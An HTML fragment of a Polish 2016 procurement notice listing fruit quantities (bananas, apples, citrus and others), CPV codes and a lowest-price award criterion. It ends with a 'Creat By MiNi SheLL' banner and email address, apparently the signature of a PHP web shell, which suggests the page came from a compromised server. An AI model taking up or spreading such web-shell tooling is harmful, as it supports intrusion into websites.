6. Arbuz w ilości 20 kg	w tym: zamówienie gwarantowane 10 kg; zamówienie opcjonalne	10 kg	
7. Kiwi w ilości 20 kg w tym: zamówienie gwarantowane 10	kg; zamówienie opcjonalne 10 kg
8. Morele	w ilości 120 kg, w tym: zamówienie gwarantowane  60 kg; zamówienie opcjonalne 60 kg
9. Brzoskwinie w ilości 120 kg w tym:zamówienie gwarantowane 60 kg; zamówienie opcjonalne 60 kg
10. Winogrona w ilości 130 kg	w tym: zamówienie gwarantowane 65 kg; zamówienie opcjonalne 65 kg
11. Jabłka	w ilości 5200 kg w tym:zamówienie gwarantowane  2 600 kg; zamówienie opcjonalne 2 600 kg
12. Gruszki	w ilości 450 kg w tym:zamówienie gwarantowane 225 kg; zamówienie opcjonalne 225 kg
13. Mango w ilości 10 kg w tym: zamówienie gwarantowane 5 kg; zamówienie opcjonalne 5 kg
14. Ananas	w ilości 10 kg w tym: zamówienie gwarantowane  5 kg; zamówienie opcjonalne 5 kg
15. Nektarynki w ilości 200 kg, w tym:zamówienie gwarantowane 100 kg; zamówienie opcjonalne 100 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.20.00-3, 03.22.21.11-4, 03.22.22.10-8, 03.22.22.20-1, 03.22.21.10-7, 03.22.22.30-4, 03.22.20.00-3, 03.22.21.18-3, 03.22.23.31-2, 03.22.23.32-9, 03.22.23.40-8, 03.22.23.21-9, 03.22.23.22-6, 03.22.21.13-8, 03.22.21.12-8, 03.22.23.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa owoców gr I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa owoców gr I w ilościach:
1. Banany	w ilości 4070 kg w tym: zamówienie gwarantowane 2 035 kg; zamówienie opcjonalne 2 035 kg
2. Cytryny	w ilości 2380 kg w tym: zamówienie gwarantowane 1 190kg; zamówienie opcjonalne 1 190 kg	
3. Pomarańcze w ilości 3370 kg w tym: zamówienie gwarantowane w ilości 1 685 kg;zmówienie opcjonalne 1 685	kg
4. Mandarynki w ilości 3220 kg w tym: zamówienie gwarantowane 1 610 kg;zamówienie opcjonalne 1 610 kg	
5. Grejpfruty w ilości 1070kg w tym: zamówienie gwarantowane 535 kg ;zamówienie opcjonalne 535 kg	
6. Arbuz w ilości 650 kg	w tym: zamówienie gwarantowane 325kg; zamówienie opcjonalne	325	kg
7. Kiwi w ilości 1220 kg w tym: zamówienie gwarantowane 610 kg; zamówienie opcjonalne	610 kg
8. Morele w ilości 760 kg w tym:zamówienie gwarantowane 380 kg;zamówienie opcjonalne 380 kg
9. Brzoskwinie w ilości 760 kg w tym: zamówienie gwarantowane 380 kg;zamówienie opcjonalne 380 kg
10. Winogrona w ilości 2850 kg, w tym:zamówienie gwarantowane 1 425 kg; zamówienie opcjonalne 1 425 kg
11. Jabłka	w ilości 12 300 kg	w tym: zamówienie gwarantowane 6 150 kg;zamówienie opcjonalne 6 150 kg
12. Gruszki	w ilości 3 670 kg	w tym: zamówienie gwarantowane1 835 kg;zamówienie opcjonalne 1 835 kg
13. Mango	w ilości 530 kg	w tym: zamówienie gwarantowane 265 kg; zamówienie opcjonalne: 265 kg	
14. Ananas	w ilości 710 kg	w tym: zamówienie gwarantowane 355 kg; zamówienie opcjonalne 355	kg
15. Nektarynki w ilości 660 kg w tym: zamówienie gwarantowane	330	kg; zamówienie opcjonalne 330kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.20.00-3, 03.22.21.11-4, 03.22.22.10-8, 03.22.22.20-1, 03.22.21.10-7, 03.22.22.30-4, 03.22.20.00-3, 03.22.21.18-3, 03.22.23.31-2, 03.22.23.32-9, 03.22.23.40-8, 03.22.23.21-9, 03.22.23.22-6, 03.22.21.13-8, 03.22.21.12-8, 03.22.23.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com